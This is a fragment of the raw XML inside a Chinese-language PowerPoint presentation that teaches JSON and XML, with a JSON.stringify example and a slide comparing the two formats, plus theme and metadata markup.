                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON.stringify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>({a: 'Hello', b: 'World'}); //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>结果是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>'{"a": "Hello", "b": "World"}'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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2494788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46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="648380"/>
            <a:ext cx="6871113" cy="1141642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="48220" tIns="48220" rIns="48220" bIns="48220" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="1285875">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr sz="5000">
                <a:latin typeface="Microsoft YaHei"/>
                <a:ea typeface="Microsoft YaHei"/>
                <a:cs typeface="Microsoft YaHei"/>
                <a:sym typeface="Microsoft YaHei"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的比较</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1C3267"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2225255"/>
            <a:ext cx="23353318" cy="816089"/>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3578" tIns="53578" rIns="53578" bIns="53578" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4600" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4600" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4600" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4600" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>都使用结构化方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>标记数据，分别使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>表示中国部分省份：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4600" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1504337" y="3421627"/>
            <a:ext cx="8967018" cy="9291484"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12329652" y="3421626"/>
            <a:ext cx="9869727" cy="9291484"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4125569322"/>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heme/_rels/theme2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/></Relationships>
</file>

<file path=ppt/theme/_rels/theme3.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254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3CBBCE"/>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:extLst>
          <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
            <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a14:hiddenLine>
          </a:ext>
        </a:extLst>
      </a:spPr>
      <a:bodyPr anchor="ctr"/>
      <a:lstStyle>
        <a:defPPr algn="ctr" eaLnBrk="1" hangingPunct="1">
          <a:defRPr>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:spDef>
    <a:lnDef>
      <a:spPr>
        <a:noFill/>
        <a:ln w="127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spPr>
      <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="53578" tIns="53578" rIns="53578" bIns="53578" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="821055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
          <a:lnSpc>
            <a:spcPct val="100000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPts val="0"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPts val="0"/>
          </a:spcAft>
          <a:buClrTx/>
          <a:buSzTx/>
          <a:buFontTx/>
          <a:buNone/>
          <a:defRPr kumimoji="0" sz="4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254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25400" dist="12700" dir="5400000" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:outerShdw>
        </a:effectLst>
      </a:spPr>
      <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="53578" tIns="53578" rIns="53578" bIns="53578" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="82105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spPr>
      <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="53578" tIns="53578" rIns="53578" bIns="53578" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="821055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
          <a:lnSpc>
            <a:spcPct val="100000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPts val="0"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPts val="0"/>
          </a:spcAft>
          <a:buClrTx/>
          <a:buSzTx/>
          <a:buFontTx/>
          <a:buNone/>
          <a:defRPr kumimoji="0" sz="4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50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </a:effectStyle>
        <a:effectStyle>
          <a:effectLst>
            <a:outerShdw blurRad="25400" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </a:effectStyle>
        <a:effectStyle>
          <a:effectLst>
            <a:outerShdw blurRad="254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25400" dist="12700" dir="5400000" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:outerShdw>
        </a:effectLst>
      </a:spPr>
      <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="53578" tIns="53578" rIns="53578" bIns="53578" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="821055"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spPr>
      <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="53578" tIns="53578" rIns="53578" bIns="53578" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="821055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
          <a:lnSpc>
            <a:spcPct val="100000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPts val="0"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPts val="0"/>
          </a:spcAft>
          <a:buClrTx/>
          <a:buSzTx/>
          <a:buFontTx/>
          <a:buNone/>
          <a:defRPr kumimoji="0" sz="4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8633</TotalTime>
  <Words>2626</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>156</Paragraphs>
  <Slides>37</Slides>
  <Notes>37</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37</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="53" baseType="lpstr">
      <vt:lpstr>DengXian</vt:lpstr>
      <vt:lpstr>Helvetica Light</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>仿宋</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>White</vt:lpstr>
      <vt:lpstr>1_White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楚金楠</dc:creator>
  <cp:lastModifiedBy>王亚强</cp:lastModifiedBy>
  <cp:revision>3338</cp:revision>
  <cp:lastPrinted>2019-07-04T09:49:40Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-04T09:49:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-01T02:02:13Z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